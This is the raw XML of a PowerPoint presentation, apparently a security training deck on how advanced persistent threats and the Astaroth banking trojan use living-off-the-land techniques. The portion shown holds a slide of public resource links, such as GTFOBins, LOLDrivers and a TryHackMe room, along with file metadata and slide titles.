        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9EF1486-8253-A3E5-15F2-12F2C6740AB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=fPdbQPhIghk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=i40v-MLpazI&amp;t=621s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=j-r6UonEkUw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://tryhackme.com/room/livingofftheland</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Linux Living Off The Land Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.loldrivers.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Living off the land with vulnerable drivers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577587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784</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>49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(Body)</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Why do Advanced Persistent Threats Utilize Living Off the Land Techniques?</vt:lpstr>
      <vt:lpstr>Goals of Living off the Land</vt:lpstr>
      <vt:lpstr>Astaroth: Banking Trojan</vt:lpstr>
      <vt:lpstr>Astaroth: Attack Chain 2020</vt:lpstr>
      <vt:lpstr>On your Host Today:</vt:lpstr>
      <vt:lpstr>More resources on Astaroth and Living Off Land</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Mike Manrod (GCE)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-24T18:51:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-11T21:31:56Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>